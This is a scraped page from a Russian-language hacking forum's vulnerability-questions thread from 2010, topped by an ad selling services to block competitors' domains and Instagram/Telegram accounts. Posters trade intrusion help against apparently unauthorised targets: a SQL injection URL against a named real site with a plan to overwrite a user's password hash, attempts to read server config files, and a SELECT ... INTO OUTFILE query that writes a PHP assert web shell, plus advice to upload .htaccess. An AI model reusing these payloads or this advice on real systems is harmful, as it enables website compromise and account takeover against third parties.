УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1376 из 1393

1376

Опции темы

Поиск в этой теме

Опции просмотра

#13751

11.06.2010, 21:08

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Bb0y дай линк почитать, а то я такого не знаю...

#13752

11.06.2010, 21:12

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от GOGA075

FlaktW у тебя же есть логин и пароль от админки...
тут никаких проблем нету..

Это хеш можно два года брутить.

#13753

11.06.2010, 21:14

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

Отправить сообщение для Bb0y с помощью ICQ

Отправить сообщение для Bb0y с помощью Yahoo

2GOGA075
https://forum.antichat.ru/thread35207.html
https://forum.antichat.ru/thread119047.html
https://www.hackzone.ru/articles/view/id/7925/
тут подробнее от Qwazar http://qwazar.ru/?p=7

Последний раз редактировалось Bb0y; 11.06.2010 в 21:20..

#13754

12.06.2010, 11:28

qq6ka

Познающий

Регистрация: 21.05.2010

Сообщений: 37

Провел на форуме:
167126

Репутация: 55

Ищу пути. В /etc/init.d/apache есть

APACHE_HOME=/usr/apache
CONF_FILE=/etc/apache/httpd.conf
RUNDIR=/var/run/apache
PIDFILE=${RUNDIR}/httpd.pid
TOMCAT_CF=/var/apache/tomcat/conf/server.xml
TOMCAT55_CF=/var/apache/tomcat55/conf/server.xml

Но!
/etc/apache/httpd.conf, /var/apache/tomcat55/conf/server.xml - не читаются, видимо прав не хватает.

Кто с TOMCAT 5.5 работал, подскажите где ещё посмотреть полезную инфу.

#13755

12.06.2010, 13:19

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?

#13756

12.06.2010, 13:57

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

Отправить сообщение для I love this game с помощью ICQ

есть доступ к админке, через картинки не получилось залить шелл, но можно бекап бд и востановление бд, подскажите какой запрос нужно сделать что бы через востановление бд залить шелл

#13757

12.06.2010, 13:58

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

заливай .htaccess

#13758

12.06.2010, 14:01

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

можно подробнее?

#13759

12.06.2010, 14:08

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

I love this game через восстановление БД тебе нужно знать путь корневой корректории.
а запрос
select '<? assert(stripslashes($_REQUEST[cmd])); ?>' into outfile '/home/WWW/shell.php';